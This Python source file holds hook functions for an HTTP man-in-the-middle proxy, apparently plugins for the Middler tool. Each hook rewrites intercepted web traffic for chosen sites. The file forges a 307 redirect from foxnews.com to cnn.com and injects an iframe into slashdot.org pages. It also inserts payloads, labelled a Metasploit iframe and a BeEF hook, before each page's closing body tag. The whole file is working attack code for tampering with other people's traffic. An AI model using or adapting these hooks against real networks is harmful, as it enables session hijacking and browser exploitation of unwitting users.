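def doResponse(session, request_header, response_header, data):
    """Rewrite a 200 text/html response for one Host into a 307 redirect.

    The hook acts only when the request's Host header matches ``target`` and
    the response Content-type matches TEXT/HTML (both tested through
    ``header.headertest``). On that path the status line is replaced with
    ``<protover> 307 Temporary Redirect`` and a Location header pointing at
    ``redirect_url`` is either overwritten or appended. Every other response
    is handed back untouched.

    What an observer sees on the wire is a 307 with a Location for a different
    site where the origin sent a 200 page.

    Args:
        session: Not used by this hook.
        request_header: Request headers, passed to ``header.headertest``.
        response_header: Sequence of (name, value) pairs whose element 0
            carries the status line as its value. Modified in place.
        data: Response body; returned unchanged.

    Returns:
        ``(response_header, data, changed, stop)``. ``changed`` and ``stop``
        are 1 only when the redirect was written, 0 otherwise.
    """
    changed = 0
    stop = 0

    # Check to see if we've got the right target site
    target = "www.foxnews.com"
    request_match = (("Host", target),)
    redirect_url = "http://www.cnn.com"

    if not header.headertest(request_header, request_match):
        return (response_header, data, changed, stop)

    # We could make sure only to do this if the browser was getting a web page.
    response_match = (("Content-type", "TEXT/HTML"),)
    if not header.headertest(response_header, response_match):
        return (response_header, data, changed, stop)

    # Check the response code line. Split at most twice: a reason phrase such
    # as "Not Found" contains a space, and an unbounded split made the
    # three-way unpack raise ValueError before the non-200 check could pass
    # the response through.
    response_code_line = response_header[0][1]
    status_parts = response_code_line.split(" ", 2)
    if len(status_parts) != 3:
        # No reason phrase (or an otherwise odd status line): leave it alone.
        ml.jjlog.debug("Could not parse response code line --%s--, leaving it unchanged\n" % response_code_line)
        return (response_header, data, changed, stop)
    protover, response_code, reason = status_parts
    print("Response code line had these elements --%s-- --%s-- --%s\n" % (protover, response_code, reason))

    # Make sure we are only doing this on a 200 message.
    if response_code != "200":
        ml.jjlog.debug("Response code was %s, not 200, so we won't inject here\n" % response_code)
        return (response_header, data, changed, stop)

    # Change the response code to a 30x redirect. The author's alternative
    # was 301 / "Moved Permanently"; 307 is the one in effect.
    response_code = 307
    reason = "Temporary Redirect\n"
    header.headerfix(response_header, "Response", "%s %s %s" % (protover, response_code, reason))

    # Check if there is a Location header already?
    # TODO: make a routine that inserts a new header after a specific line.
    if header.headerget(response_header, "Location") and redirect_url:
        header.headerfix(response_header, "Location", redirect_url + "\n")
        ml.jjlog.debug("Replaced the location: %s\n" % redirect_url)
    else:
        response_header.append(("Location", redirect_url + "\n"))
        ml.jjlog.debug("Appended our own location: %s\n" % redirect_url)

    # We have changed the header and we don't want any other plugins to touch it.
    # TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
    # NOTE(review): the listing lost its indentation; these flags are placed on
    # the modified path because the comment above describes that path.
    changed = 1
    stop = 1
    return (response_header, data, changed, stop)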
def doResponse(session, request_header, response_header, data):
    """Insert a fixed <iframe> right after ``<body>`` in one site's HTML pages.

    The hook acts when the request's Host header matches ``target``, the
    response Content-type matches TEXT/HTML and the status code is "200".
    It then rewrites every literal ``<body>`` in ``data`` to ``<body>``
    followed by the iframe markup, and sets Content-Length to
    ``str(len(data))``. All other responses are returned untouched.

    What an observer sees is an extra iframe element directly after the
    opening body tag and a Content-Length that no longer matches what the
    origin sent.

    Args:
        session: Not used by this hook.
        request_header: Request headers, passed to ``header.headertest``.
        response_header: Response headers; element 0 carries the status line
            as its value. Updated through ``header.headerfix``.
        data: Response body text.

    Returns:
        ``(response_header, data, changed, stop)``; both flags are 1 on the
        modified path and 0 otherwise.
    """
    changed = 0
    stop = 0
    i = 1  # never read in this block

    # Check to see if we've got the right target site
    target = "slashdot.org"
    request_match = (("Host", target),)

    # Set up the IFRAME to inject into the HTML
    # TODO: Set the traffic capture code that gets my IP address to log it into
    #       some kind of global or class variable.
    inserted_url = "http://www.inguardians.com/tools/logo-themiddler-150px.jpg"
    iframe = '''<iframe height=103 width=150 src="%s"></iframe>''' % (inserted_url)

    unmodified = (response_header, data, changed, stop)

    if not header.headertest(request_header, request_match):
        return unmodified

    # We could make sure only to do this if the browser was getting a web page.
    response_match = (("Content-type", "TEXT/HTML"),)
    if not header.headertest(response_header, response_match):
        return unmodified

    # Check the response code line.
    status_line = response_header[0][1]
    protover, response_code, reason = status_line.split(" ", 2)
    ml.jjlog.debug("Response code line had these elements --%s-- --%s-- --%s\n" % (protover, response_code, reason))

    # Make sure we are only doing this on a 200 message.
    # There's no point to injecting into a 30x redirect!
    if response_code != "200":
        return unmodified

    ml.jjlog.debug("Preparing to inject iframe into request for %s" % target)

    ### MANIPULATE DATA - INSERT SCRIPT
    data = re.sub(r'\<body\>', r'<body>' + iframe, data)
    changed = 1

    ### Correct the content-length.
    header.headerfix(response_header, "Content-Length", str(len(data)))

    # We have changed the header and we don't want any other plugins to touch it.
    # TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
    # NOTE(review): the listing lost its indentation; these flags are placed on
    # the modified path because the comment above describes that path.
    changed = 1
    stop = 1
    return (response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
    """Replace the response body with ``redirect_code`` when both header tests match.

    ``request_match``, ``response_match``, ``redirect_code`` and
    ``redirect_url`` are defined outside this block. Both
    ``header.headertest`` calls are always made; their results are combined
    with ``&``.

    As written, ``changed`` is never set on the matching path, so the function
    always reports ``changed == 0`` and the Content-Length update at the end
    does not run.

    Args:
        session: Not used by this hook.
        request_header: Request headers, passed to ``header.headertest``.
        response_header: Response headers, passed to ``header.headertest``.
        data: Response body.

    Returns:
        ``(response_header, data, changed, stop)``; ``data`` is
        ``redirect_code`` on a match, the original body otherwise.
    """
    changed = 0
    stop = 0

    ### DETERMINE IF WE NEED TO CHANGE DATA
    request_hit = header.headertest(request_header, request_match)
    response_hit = header.headertest(response_header, response_match)

    if request_hit & response_hit:
        ### MANIPULATE DATA
        data = redirect_code
        print("User has been redirected to " + redirect_url)

    ### RETURN DATA
    if changed:
        new_length = str(len(data))
        header.headerfix(response_header, "Content-Length", new_length)

    return (response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
    """Insert ``code1`` before each literal ``</body>`` when both header tests match.

    ``request_match``, ``response_match`` and ``code1`` are defined outside
    this block; the console message labels the inserted markup a Metasploit
    iframe. Both ``header.headertest`` calls are always made and their results
    combined with ``&``. On a match, Content-Length is reset to
    ``str(len(data))``.

    What an observer sees is additional markup immediately before the closing
    body tag and a recomputed Content-Length header.

    Args:
        session: Not used by this hook.
        request_header: Request headers, passed to ``header.headertest``.
        response_header: Response headers; updated through
            ``header.headerfix`` on a match.
        data: Response body text.

    Returns:
        ``(response_header, data, changed, stop)``; ``changed`` is 1 on a
        match (even if no ``</body>`` was present), ``stop`` is always 0.
    """
    changed = 0
    stop = 0

    ### DETERMINE IF WE NEED TO CHANGE DATA
    request_hit = header.headertest(request_header, request_match)
    response_hit = header.headertest(response_header, response_match)
    if not (request_hit & response_hit):
        return (response_header, data, changed, stop)

    ### MANIPULATE DATA - INSERT SCRIPT
    data = re.sub('</body>', code1 + '</body>', data)
    changed = 1
    print("Metasploit iframe injected")

    ### RETURN DATA
    # The body length changed, so the advertised length is recalculated.
    header.headerfix(response_header, "Content-Length", str(len(data)))
    return (response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
    """Insert ``code1`` before each literal ``</body>`` when both header tests match.

    ``request_match``, ``response_match`` and ``code1`` are defined outside
    this block; the console message labels the inserted markup a BeEF hook.
    Both ``header.headertest`` calls are always made and their results
    combined with ``&``. On a match, Content-Length is reset to
    ``str(len(data))``.

    What an observer sees is additional markup immediately before the closing
    body tag and a recomputed Content-Length header.

    Args:
        session: Not used by this hook.
        request_header: Request headers, passed to ``header.headertest``.
        response_header: Response headers; updated through
            ``header.headerfix`` on a match.
        data: Response body text.

    Returns:
        ``(response_header, data, changed, stop)``; ``changed`` is 1 on a
        match (even if no ``</body>`` was present), ``stop`` is always 0.
    """
    changed = 0
    stop = 0

    ### DETERMINE IF WE NEED TO CHANGE DATA
    request_hit = header.headertest(request_header, request_match)
    response_hit = header.headertest(response_header, response_match)
    headers_match = request_hit & response_hit

    if headers_match:
        ### MANIPULATE DATA - INSERT SCRIPT
        closing_tag = '</body>'
        data = re.sub(closing_tag, code1 + closing_tag, data)
        changed = 1
        print("BeEF hook injected")

    ### RETURN DATA
    if not changed:
        return (response_header, data, changed, stop)

    # The body length changed, so the advertised length is recalculated.
    header.headerfix(response_header, "Content-Length", str(len(data)))
    return (response_header, data, changed, stop)
def doRequest(session, request_header, data):
    """Request hook whose Host-header rewrite is switched off.

    The rewrite branch is guarded by a constant 0, so the header test is never
    evaluated and the request is always returned unmodified with both flags
    at 0.

    Args:
        session: Not used by this hook.
        request_header: Request headers; returned as received.
        data: Request body; returned as received.

    Returns:
        ``(request_header, data, changed, stop)`` with ``changed == 0`` and
        ``stop == 0``.
    """
    changed = 0
    stop = 0

    # Bug - this routine is only changing the Host header, but isn't
    #       changing the socket's destination. Further, the host
    #       header shouldn't contain a full URL, just a hostname.
    #       Remember, the Host header was an HTTP/1.1 addition
    #       intended to tell the remote server which virtual
    #       host the browser was requesting.
    rewrite_enabled = 0  # hard-wired off because of the bug described above

    if rewrite_enabled and header.headertest(request_header, request_match):
        ### MANIPULATE DATA
        changed = 1
        stop = 1
        header.headerfix(request_header, "Host", redirect_url + '\r\n')
        print("User request URL has been rewritten to " + redirect_url)

    ### RETURN DATA
    return (request_header, data, changed, stop)